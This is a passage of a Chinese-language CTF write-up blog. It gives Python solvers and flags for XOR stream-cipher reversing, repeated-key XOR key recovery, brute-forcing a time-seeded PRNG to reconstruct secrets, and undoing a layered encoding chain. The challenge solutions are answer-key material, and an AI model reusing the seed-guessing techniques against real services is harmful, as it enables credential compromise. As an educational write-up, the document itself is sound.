id=\"\u6700\u7ec8\u7ed3\u8bba\">\u6700\u7ec8\u7ed3\u8bba<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u6ce8\u518c\u7801<\/strong> <code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Flag<\/strong> <code>flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"night-market\">Night Market<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p 
class=\"wp-block-paragraph\">\u591c\u5e02\u7ba1\u7406\u5458\u7559\u4e0b\u4e86\u4e00\u4e2a\u5c0f\u7a0b\u5e8f\uff0c\u636e\u8bf4\u53ea\u6709\u8f93\u5165\u6b63\u786e\u7684\u901a\u884c\u53e3\u4ee4\uff0c\u644a\u4f4d\u706f\u724c\u624d\u4f1a\u4eae\u8d77\u3002 \u4f60\u62ff\u5230\u4e86\u6821\u9a8c\u7a0b\u5e8f\u548c\u51e0\u4efd\u53ef\u7591\u7684\u5b57\u8282\u6570\u7ec4\u3002\u8bf7\u9006\u5411\u7a0b\u5e8f\u4e2d\u7684 XOR \u53d8\u6362\u903b\u8f91\uff0c\u8fd8\u539f\u539f\u59cb\u8f93\u5165\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">37 \u5b57\u7b26\u6d41\u5bc6\u7801\u9a8c\u8bc1\u7a0b\u5e8f\u3002\u8f93\u5165 ticket \u7ecf\u4f4d\u7f6e\u7f6e\u6362 + \u72b6\u6001\u53cd\u9988\u6d41\u5bc6\u7801 XOR \u52a0\u5bc6\u540e\u4e0e <code>want<\/code> \u6570\u7ec4\u6bd4\u5bf9\u3002\u7531\u4e8e\u72b6\u6001\u66f4\u65b0\u4ec5\u4f9d\u8d56 cipher \u503c\uff0c\u800c cipher \u5fc5\u987b\u7b49\u4e8e <code>want[i]<\/code> \u624d\u80fd\u901a\u8fc7\u9a8c\u8bc1\uff0c\u6545\u53ef\u6b63\u5411\u63a8\u6f14\u51fa\u5b8c\u6574 ticket\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u5206\u6790\u6d41\u5bc6\u7801\u7ed3\u6784\">1: \u5206\u6790\u6d41\u5bc6\u7801\u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>check_ticket<\/code> \u51fd\u6570\u5bf9\u6bcf\u4e2a\u4f4d\u7f6e <code>i<\/code> \u6267\u884c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>pos = route_at(i)<\/code> \u2014 \u901a\u8fc7 <code>box_a[i] ^ (i*19+0x5d)<\/code> \u6253\u4e71\u8bfb\u53d6\u4f4d\u7f6e<\/li>\n\n\n\n<li><code>cipher = ticket[pos] ^ stream_at(i, state)<\/code> \u2014 \u6d41\u5bc6\u7801 XOR<\/li>\n\n\n\n<li><code>mixed[i] = cipher<\/code> \u2014 \u5b58\u5165\u7ed3\u679c\u6570\u7ec4<\/li>\n\n\n\n<li><code>state = next_state(i, state, cipher)<\/code> \u2014 \u66f4\u65b0\u72b6\u6001<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8 <code>mixed == want<\/code> \u624d\u901a\u8fc7\u9a8c\u8bc1\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" 
id=\"2-\u6b63\u5411\u53cd\u63a8-ticket\">2: \u6b63\u5411\u53cd\u63a8 ticket<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9a8c\u8bc1\u901a\u8fc7\u65f6 <code>cipher = mixed[i] = want[i]<\/code> \u5b8c\u5168\u5df2\u77e5\uff0c<code>state<\/code> \u66f4\u65b0\u4e5f\u53ea\u4f9d\u8d56\u5df2\u77e5\u503c\uff0c\u56e0\u6b64\u53ef\u4ece\u521d\u59cb <code>state=0xa6<\/code> \u9010\u8f6e\u8ba1\u7b97\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>ticket[pos] = want[i] ^ stream_at(i, state)<\/code><\/li>\n\n\n\n<li><code>state = next_state(i, state, want[i])<\/code> TICKET_LEN = 37 box_a = bytes([0x43,0x69,0xa0,0x92,0xb5,0xad,0xcc,0xe8,0xf5,0x2c,0x0e,0x27,<br>0x57,0x56,0x7a,0x65,0x88,0xb3,0xbd,0xd4,0xc1,0xe7,0xfe,0x30,<br>0x28,0x23,0x4c,0x58,0x79,0x94,0x8d,0xbd,0x9c,0xdf,0xc3,0xe2,0x05])<br>box_b = bytes([0xd3,0xb5,0x18,0xba,0xe4,0xfa,0x2a,0xba,0x9d,0x37,0xc9,0xae,<br>0xd6,0x76,0xc6,0x03])<br>want = bytes([0x8e,0x60,0xb8,0x44,0x5e,0x3f,0x42,0xa2,0xce,0x14,0x20,0x7a,<br>0x0e,0x6c,0xa8,0xb0,0xb2,0xe7,0xaf,0xaf,0x3f,0xfa,0xf0,0x50,<br>0xa9,0xe7,0x7e,0x40,0x55,0x04,0x86,0xe9,0xf4,0x82,0x1e,0x47,0xa9]) def rol8(x, r):<br>return ((x &lt;&lt; r) | (x &gt;&gt; (8 &#8211; r))) &amp; 0xff def route_at(i):<br>return box_a[i] ^ ((i * 19 + 0x5d) &amp; 0xff) def seed_at(i):<br>return box_b[i] ^ ((i * 23 + 0x91) &amp; 0xff) def stream_at(i, state):<br>a = seed_at((i * 7 + 3) &amp; 15)<br>b = seed_at((i * 5 + 11) &amp; 15)<br>p = (i * 0x3d + 0x5b) &amp; 0xff<br>return (rol8((a + i) &amp; 0xff, 3) ^<br>rol8((b ^ (i * 0x29)) &amp; 0xff, 1) ^ state ^ p) &amp; 0xff def next_state(i, state, cipher):<br>a = seed_at((i * 7 + 3) &amp; 15)<br>spice = (i * 13 + 0x37) &amp; 0xff<br>return rol8((state ^ cipher ^ a ^ spice) &amp; 0xff, 1) state = 0xa6<br>ticket = [0] * TICKET_LEN<br>for i in range(TICKET_LEN):<br>pos = route_at(i)<br>ticket[pos] = want[i] ^ stream_at(i, state)<br>state = next_state(i, state, want[i]) flag = bytes(ticket).decode()<br>print(flag)<\/li>\n<\/ul>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u5f97\u5230flag\uff1a<code>flag{neon_xor_chain_nFR7059MIEPeN9o4}<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u5bc6\u7801\">\u5bc6\u7801<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"night-watch\">Night Watch<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u53f0\u65e7\u7f51\u5173\u4f1a\u5728\u5348\u591c\u5bfc\u51fa\u4e00\u4efd\u5ba1\u8ba1\u8bb0\u5f55\u3002\u7ba1\u7406\u5458\u4e3a\u4e86\u56fe\u65b9\u4fbf\uff0c\u4f7f\u7528\u201c\u77ed\u5bc6\u94a5\u5faa\u73af\u5f02\u6216\u201d\u7684\u65b9\u5f0f\u4fdd\u62a4\u6574\u4efd\u6587\u4ef6\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u73b0\u5728\u4f60\u62ff\u5230\u4e86\u5bfc\u51fa\u7684\u5bc6\u6587 ciphertext.bin\u3002\u8bf7\u6062\u590d\u660e\u6587\u5e76\u63d0\u4ea4\u5176\u4e2d\u7684 flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u660e\u6587\u662f\u4ee5 ASCII \u4e3a\u4e3b\u7684\u65e5\u5fd7\/\u5ba1\u8ba1\u6587\u672c\uff1b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u52a0\u5bc6\u7b97\u6cd5\u662f repeated-key XOR\uff0c\u5373 key \u4f1a\u5faa\u73af\u4f7f\u7528\uff1b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">key \u662f\u53ef\u6253\u5370\u5b57\u7b26\u7ec4\u6210\u7684\u77ed\u5b57\u7b26\u4e32\uff0c\u4f46\u957f\u5ea6\u672a\u77e5\uff1b<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">40630 \u5b57\u8282\u5bc6\u6587\uff0c\u4f7f\u7528\u77ed\u5bc6\u94a5\u5faa\u73af\u5f02\u6216\u52a0\u5bc6 ASCII \u5ba1\u8ba1\u65e5\u5fd7\u3002\u901a\u8fc7\u91cd\u5408\u6307\u6570\uff08IC\uff09\u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6\u4e3a 17\uff0c\u9010\u4f4d\u7f6e\u9891\u7387\u5206\u6790\u6062\u590d\u5bc6\u94a5 <code>Nebula_Rook_2026!<\/code>\uff0c\u89e3\u5bc6\u5f97 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6\">1: \u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6<\/h4>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u5bf9\u4e0d\u540c\u5bc6\u94a5\u957f\u5ea6\u8ba1\u7b97\u91cd\u5408\u6307\u6570\uff08Index of Coincidence\uff09\u3002\u968f\u673a\u6570\u636e IC \u2248 0.0118\uff0c\u82f1\u8bed\u6587\u672c IC \u2248 0.065\u3002\u5728 len=17 \u548c len=34\uff082\u00d717\uff09\u5904 IC \u9aa4\u5347\u81f3 ~0.037\uff0c\u786e\u8ba4\u5bc6\u94a5\u957f\u5ea6\u4e3a 17\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u9010\u4f4d\u7834\u89e3\u5bc6\u94a5\">2: \u9010\u4f4d\u7834\u89e3\u5bc6\u94a5<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u5bc6\u6587\u6309 17 \u4e2a\u504f\u79fb\u4f4d\u7f6e\u5206\u4e3a 17 \u7ec4\uff0c\u6bcf\u7ec4\u72ec\u7acb\u5355\u5b57\u8282 XOR\u3002\u5bf9\u6bcf\u4e2a\u4f4d\u7f6e\u904d\u5386\u53ef\u6253\u5370 ASCII (0x20-0x7E)\uff0c\u4ee5\u82f1\u8bed\u5b57\u6bcd\u9891\u7387\u8bc4\u5206\uff0c\u9009\u6700\u4f18\u5b57\u8282\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    data = open('ciphertext.bin', 'rb').read()\n\n    def score_text(text):\n        s = 0\n        for b in text:\n            if 0x20 &lt;= b &lt;= 0x7e:\n                s += 1\n                c = chr(b).lower()\n                if c in 'etaoinshrdl': s += 2\n                elif c in 'cumwfgypbvkjxqz': s += 0.5\n            elif b in (0x0a, 0x0d, 0x09): s += 0.5\n            else: s -= 3\n        return s \/ max(len(text), 1)\n\n    kl = 17\n    key = &#91;]\n    for offset in range(kl):\n        chunk = data&#91;offset::kl]\n        best = max(range(0x20, 0x7f),\n                   key=lambda kb: score_text(bytes(&#91;b ^ kb for b in chunk])))\n        key.append(best)\n\n    key = bytes(key)\n    print(f\"Key: {key.decode()}\")  # Nebula_Rook_2026!\n\n    plain = bytes(data&#91;i] ^ key&#91;i % kl] for i in range(len(data)))\n    # Find flag\n    idx = plain.find(b'LHFLAG{')\n    end = plain.find(b'}', idx)\n    print(plain&#91;idx:end+1].decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre 
class=\"wp-block-code\"><code>LHFLAG{r3p3at_x0r_stat_leak_6f2c9a18}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u6253\u7834\u65f6\u95f4\u80f6\u56ca\">\u6253\u7834\u65f6\u95f4\u80f6\u56ca<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u5bc6\u7801\u91cd\u7f6e\u670d\u52a1\u5728\u542f\u52a8\u65f6\u4f7f\u7528 int(time.time()) \u4f5c\u4e3a Python\u4e2drandom.Random\u7684\u79cd\u5b50\u3002 \u5b83\u4f1a\u5148\u751f\u6210\u4e00\u4e2a\u516c\u5f00\u7684\u91cd\u7f6e token\uff0c\u7136\u540e\u7ee7\u7eed\u7528\u540c\u4e00\u4e2a PRNG \u751f\u6210\u7ba1\u7406\u5458 PIN \u548c\u52a0\u5bc6 flag \u7684\u5bc6\u94a5\u6750\u6599\u3002 \u4f60\u62ff\u5230\u4e86\u6e90\u7801 chall.py\u548c\u4e00\u6b21\u771f\u5b9e\u8fd0\u884c\u7559\u4e0b\u7684 public_log.txt\u3002\u670d\u52a1\u542f\u52a8\u65f6\u95f4\u53ea\u77e5\u9053\u4e00\u4e2a\u5927\u81f4\u8303\u56f4\u3002 \u8bf7\u6062\u590d flag<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9605\u8bfb <code>chall.py<\/code> \u6e90\u7801\uff0c\u5173\u952e\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    seed = int(time.time())          # \u2460 \u79cd\u5b50 = \u542f\u52a8\u65f6\u7684 Unix \u65f6\u95f4\u6233\uff08\u79d2\u7ea7\u7cbe\u5ea6\uff09\n    rnd = random.Random(seed)\n\n    burn_count = 300 + (rnd.getrandbits(16) % 700)  # \u2461 \u968f\u673a\"\u9884\u70ed\" 300~999 \u6b21\n    for _ in range(burn_count):\n        rnd.getrandbits(8 + 8 * (rnd.getrandbits(2) % 4))  # \u2462 \u6d88\u8017\u968f\u673a\u6570\n\n    reset_token = \"...\".format(...)   # \u2463 \u516c\u5f00\u7684 reset token\uff08\u5df2\u77e5\uff09\n    admin_pin    = \"...\"             # \u2464 \u7ba1\u7406\u5458 PIN\uff08\u672a\u77e5\uff09\n    nonce        = bytes(...)        # \u2465 \u52a0\u5bc6\u7528\u7684 nonce\uff08\u5df2\u77e5\uff09\n    key_material = bytes(...)        
# \u2466 \u52a0\u5bc6\u7528\u7684\u5bc6\u94a5\u6750\u6599\uff08\u672a\u77e5\uff09\n\n    key = sha256(key_material + reset_token + admin_pin)\n    ciphertext = xor_stream(flag, key, nonce)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6574\u4e2a\u7cfb\u7edf\u4f7f\u7528 <strong>\u540c\u4e00\u4e2a PRNG \u5b9e\u4f8b<\/strong> \u4f9d\u6b21\u751f\u6210\u6240\u6709\u503c\u3002<code>reset_token<\/code> \u662f\u516c\u5f00\u7684\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u9a8c\u8bc1\u79cd\u5b50\u7684&#8221;\u68c0\u67e5\u70b9&#8221;\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"\u7834\u7efd\">\u7834\u7efd<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u79cd\u5b50\u7a7a\u95f4\u6781\u5c0f<\/strong>\uff1a<code>int(time.time())<\/code> \u53ea\u6709\u79d2\u7ea7\u7cbe\u5ea6\uff0c\u800c\u9898\u76ee\u7ed9\u51fa\u4e86\u670d\u52a1\u542f\u52a8\u65f6\u95f4\u8303\u56f4\u2014\u20142026-05-16 09:00:00 ~ 13:00:00\uff08\u4e9a\u6d32\/\u65b0\u52a0\u5761\uff0cUTC+8\uff09\uff0c\u5171 4 \u5c0f\u65f6 = <strong>14400 \u4e2a\u5019\u9009\u79cd\u5b50<\/strong>\u3002<\/li>\n\n\n\n<li><strong>\u516c\u5f00 token \u53ef\u9a8c\u8bc1<\/strong>\uff1a<code>reset_token<\/code> \u5728 <code>public_log.txt<\/code> \u4e2d\u5df2\u77e5\uff0c\u7528\u5b83\u5373\u53ef\u5224\u5b9a\u54ea\u4e2a\u79cd\u5b50\u662f\u6b63\u786e\u7684\u3002<\/li>\n\n\n\n<li><strong>PRNG \u5b8c\u5168\u53ef\u590d\u73b0<\/strong>\uff1aPython \u7684 <code>random.Random(seed)<\/code> \u662f\u7eaf\u786e\u5b9a\u6027\u7684 Mersenne Twister\uff0c\u7ed9\u5b9a\u76f8\u540c\u79cd\u5b50 \u2192 \u76f8\u540c\u8f93\u51fa\u5e8f\u5217\u3002<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u8f6c\u6362\u65f6\u95f4\u8303\u56f4\">1 \u2014 \u8f6c\u6362\u65f6\u95f4\u8303\u56f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e9a\u6d32\/\u65b0\u52a0\u5761 (UTC+8) \u2192 UTC\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table 
class=\"has-fixed-layout\"><thead><tr><th>\u5f53\u5730\u65f6\u95f4<\/th><th>UTC<\/th><\/tr><\/thead><tbody><tr><td>2026-05-16 09:00:00<\/td><td>2026-05-16 01:00:00<\/td><\/tr><tr><td>2026-05-16 13:00:00<\/td><td>2026-05-16 05:00:00<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u5e94 Unix \u65f6\u95f4\u6233\uff1a<code>1778893200<\/code> ~ <code>1778907600<\/code>\uff0c\u5171 14400 \u4e2a\u5019\u9009\u79cd\u5b50\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u7206\u7834\u79cd\u5b50\">2 \u2014 \u7206\u7834\u79cd\u5b50<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u6bcf\u4e2a\u5019\u9009\u79cd\u5b50\uff0c\u7528\u5b8c\u5168\u76f8\u540c\u7684 PRNG \u64cd\u4f5c\u6d41\u7a0b\u590d\u73b0 <code>reset_token<\/code>\uff0c\u4e0e\u76ee\u6807\u503c\u6bd4\u5bf9\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    TARGET = \"73cf64abf63757312bcee076\"\n\n    def try_seed(seed):\n        rnd = random.Random(seed)\n        burn_count = 300 + (rnd.getrandbits(16) % 700)\n        for _ in range(burn_count):\n            rnd.getrandbits(8 + 8 * (rnd.getrandbits(2) % 4))\n        reset_token = \"\".join(f\"{rnd.getrandbits(8):02x}\" for _ in range(12))\n        return reset_token\n\n    for seed in range(START_TS, END_TS + 1):\n        if try_seed(seed) == TARGET:\n            print(f\"FOUND: {seed}\")\n            break<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ea6 2 \u79d2\u540e\u547d\u4e2d\uff1a <code>Seed: 1778896043<\/code><\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u6062\u590d-flag\">3 \u2014 \u6062\u590d flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u6b63\u786e\u7684\u79cd\u5b50\u5b8c\u6574\u590d\u73b0 PRNG \u5e8f\u5217\uff0c\u4f9d\u6b21\u63d0\u53d6 <code>admin_pin<\/code>\u3001<code>nonce<\/code>\u3001<code>key_material<\/code>\uff0c\u63a8\u5bfc AES-like XOR \u6d41\u7684\u5bc6\u94a5\uff0c\u89e3\u5bc6 ciphertext\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    rnd = 
random.Random(1778896043)\n    # ... \u590d\u73b0 burn \u9636\u6bb5 ...\n    reset_token = ...  # \u9a8c\u8bc1\u901a\u8fc7\n    admin_pin    = \"093031\"\n    nonce        = bytes.fromhex(\"eefdeebaded7d55f7c855f98\")\n    key_material = bytes.fromhex(\"4b68302da289f4c775e0b966b423163b...\")\n\n    key = sha256(key_material + reset_token.encode() + admin_pin.encode())\n    flag = xor_stream(ciphertext, key, nonce)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{t1m3_s33d_rng_can_b3_gu3ss3d_4f7c9a}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u603b\u7ed3\">\u603b\u7ed3<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9053\u9898\u7684\u6838\u5fc3\u6559\u8bad\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><code>time.time()<\/code> \u4e0d\u662f\u5bc6\u7801\u5b66\u5b89\u5168\u7684\u968f\u673a\u6e90<\/strong>\u3002\u79d2\u7ea7\u7cbe\u5ea6\u7684\u79cd\u5b50\u7a7a\u95f4\u6781\u5c0f\uff08\u672c\u9898\u4ec5 14400 \u79cd\u53ef\u80fd\uff09\uff0c\u914d\u5408\u4e00\u4e2a\u5df2\u77e5\u7684 PRNG \u8f93\u51fa\u5373\u53ef\u5728\u6570\u79d2\u5185\u7206\u7834\u3002<\/li>\n\n\n\n<li>\u6d89\u53ca\u5b89\u5168\u7684\u968f\u673a\u6570\u751f\u6210\u5e94\u4f7f\u7528 <code>secrets<\/code> \u6a21\u5757\uff08Python\uff09\u6216 <code>\/dev\/urandom<\/code>\uff0c\u800c\u975e <code>random<\/code> \u6a21\u5757\u3002<\/li>\n\n\n\n<li>\u5373\u4f7f\u52a0\u4e86&#8221;\u9884\u70ed&#8221;\uff08burn\uff09\u9636\u6bb5\uff0c\u53ea\u8981\u6574\u4e2a PRNG \u72b6\u6001\u662f\u7531\u540c\u4e00\u4e2a\u79cd\u5b50\u6d3e\u751f\u7684\uff0c\u653b\u51fb\u8005\u4f9d\u7136\u53ef\u4ee5\u5b8c\u7f8e\u590d\u73b0\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"morph-encoder\">Morph Encoder<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u670b\u53cb\u8bf4\u666e\u901a\u7f16\u7801\u9898\u5728 AI 
\u9762\u524d\u592a\u5bb9\u6613\u4e86\uff0c\u4e8e\u662f\u6211\u7ed9\u540c\u4e00\u6bb5\u6570\u636e\u6362\u4e86\u51e0\u526f\u201c\u9762\u5b54\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9644\u4ef6\u4e2d\u7ed9\u51fa\u4e86 <a href=\"http:\/\/chall.py\">chall.py<\/a> \u548c output.txt\u3002\u8bf7\u5206\u6790\u7f16\u7801\u6d41\u7a0b\uff0c\u6062\u590d\u539f\u59cb flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u81ea\u5b9a\u4e49\u591a\u5c42\u7f16\u7801\u94fe\uff1atwist XOR \u2192 base85 \u2192 custom base64 \u2192 chunk_mirror \u2192 snake_fence \u2192 custom base32\u3002\u9010\u5c42\u9006\u5411\u5373\u53ef\u6062\u590d flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u5206\u6790\u7f16\u7801\u94fe\">1: \u5206\u6790\u7f16\u7801\u94fe<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>chall.py<\/code> \u5b9a\u4e49\u4e86 5 \u5c42\u53d8\u6362\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5c42<\/th><th>\u51fd\u6570<\/th><th>\u64cd\u4f5c<\/th><\/tr><\/thead><tbody><tr><td>1<\/td><td><code>twist<\/code><\/td><td>XOR <code>(i*73+41) &amp; 0xff<\/code>\uff08\u81ea\u9006\uff09<\/td><\/tr><tr><td>2<\/td><td><code>base64.b85encode<\/code><\/td><td>\u6807\u51c6 base85<\/td><\/tr><tr><td>3<\/td><td><code>custom_b64<\/code><\/td><td>\u6807\u51c6 base64 \u6362\u81ea\u5b9a\u4e49\u5b57\u6bcd\u8868 <code>M64<\/code><\/td><\/tr><tr><td>4<\/td><td><code>chunk_mirror<\/code><\/td><td>5 \u5b57\u7b26\u5206\u5757 \u2192 \u5947\u5757\u53cd\u8f6c \u2192 \u53f3\u65cb 3 \u5757<\/td><\/tr><tr><td>5<\/td><td><code>snake_fence<\/code><\/td><td>7 \u5217\u6805\u680f\uff0c\u5947\u6570\u5217\u53cd\u8f6c<\/td><\/tr><tr><td>6<\/td><td><code>custom_b32<\/code><\/td><td>\u6807\u51c6 base32 \u6362\u81ea\u5b9a\u4e49\u5b57\u6bcd\u8868 <code>M32<\/code> \u2192 8 \u5b57\u7b26\u7ec4\u53cd\u8f6c<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u9010\u5c42\u9006\u5411\">2: 
\u9010\u5c42\u9006\u5411<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9006\u5411\u987a\u5e8f\u4e0e\u7f16\u7801\u76f8\u53cd\uff1acustom_b32 \u2192 snake_fence \u2192 chunk_mirror \u2192 custom_b64 \u2192 base85 \u2192 twist\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import base64\n\n    STD64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\n    M64   = \"qazwsxedcrfvtgbyhnujmiklopQAZWSXEDCRFVTGBYHNUJMIKLOP9876543210-_\"\n    STD32 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567\"\n    M32   = \"ZYXWVUTSRQPONMLKJIHGFEDCBA765432\"\n\n    output = \"NI7HT.KADDH46L.TYAS5EPV.VMNT5AOR.MQNWZ7IW.LQWC5I77.TYWVLDO3.MUNEL7QF.T4XE3EGG.MUDEFA7C.LBBTFGYA.LQNFR56K.MMFWR7WG\"\n\n    # 1) Reverse custom_b32\n    groups = output.split(\".\")&#91;::-1]\n    morphed = \"\".join(groups)\n    trans_b32 = str.maketrans(M32, STD32)\n    b32_str = morphed.translate(trans_b32)\n    b32_str += \"=\" * ((-len(b32_str)) % 8)\n    s = base64.b32decode(b32_str).decode()\n\n    # 2) Reverse snake_fence (width=7)\n    width, n_rows = 7, len(s) \/\/ 7\n    cols = &#91;]\n    for c in range(width):\n        col = list(s&#91;c * n_rows:(c + 1) * n_rows])\n        if c % 2 == 1:\n            col = col&#91;::-1]\n        cols.append(col)\n    rows = &#91;\"\".join(cols&#91;c]&#91;i] for c in range(width)) for i in range(n_rows)]\n    s = \"\".join(rows).rstrip(\"#\")\n\n    # 3) Reverse chunk_mirror (chunk=5, rot=3)\n    blocks = &#91;s&#91;i:i+5] for i in range(0, len(s), 5)]\n    blocks = blocks&#91;3:] + blocks&#91;:3]   # left-rotate by 3\n    blocks = &#91;b&#91;::-1] if i % 2 else b for i, b in enumerate(blocks)]\n    s = \"\".join(blocks).rstrip(\"~\")\n\n    # 4) Reverse custom_b64\n    trans_b64 = str.maketrans(M64, STD64)\n    b64_str = s.translate(trans_b64)\n    b64_str += \"=\" * ((-len(b64_str)) % 4)\n    b85_str = base64.b64decode(b64_str).decode()\n\n    # 5) Reverse base85\n    twisted = base64.b85decode(b85_str)\n\n    # 6) Reverse 
twist\n    flag = bytes((b ^ ((i * 73 + 41) &amp; 0xff)) for i, b in enumerate(twisted))\n    print(flag.decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{m0rph_Enc0ding_9f42b6c1a8}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"lcg-rsa\u7684\u5f3a\u5f3a\u8054\u624b\">LCG-RSA\u7684\u5f3a\u5f3a\u8054\u624b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u4e00\u6b21\u8c03\u8bd5\u65e5\u5fd7\u4e2d\u610f\u5916\u6cc4\u9732\u4e86\u67d0\u4e2a\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668\uff08LCG\uff09\u7684\u8fde\u7eed\u8f93\u51fa\u3002\u670d\u52a1\u7aef\u4f7f\u7528\u540c\u4e00\u4e2a LCG \u7684\u540e\u7eed\u72b6\u6001\u751f\u6210 RSA \u7684\u4e24\u4e2a\u7d20\u6570\uff0c\u5e76\u5bf9 flag \u8fdb\u884c\u4e86\u52a0\u5bc6\u3002 \u8bf7\u6839\u636e\u9644\u4ef6\u4e2d\u7684 task.py \u548c output.txt \u6062\u590d flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u9898\u76ee\u6e90\u7801\u5206\u6790\">\u9898\u76ee\u6e90\u7801\u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u6838\u5fc3\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    class LCG:\n        def __init__(self, m: int, a: int, b: int, seed: int):\n            self.m = m\n            self.a = a\n            self.b = b\n            self.x = seed\n\n        def next(self) -&gt; int:\n            self.x = (self.a * self.x + self.b) % self.m\n            return self.x\n\n    rng = LCG(M, A, B, SEED)\n\n    leak = &#91;rng.next() for _ in range(10)]\n\n    p = next_prime(rng.next())\n    q = next_prime(rng.next())\n\n    n = p * q\n    e = 65537\n    c = pow(int.from_bytes(FLAG, \"big\"), e, n)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece\u4ee3\u7801\u53ef\u4ee5\u770b\u51fa\uff1a<\/p>\n\n\n\n<ol 
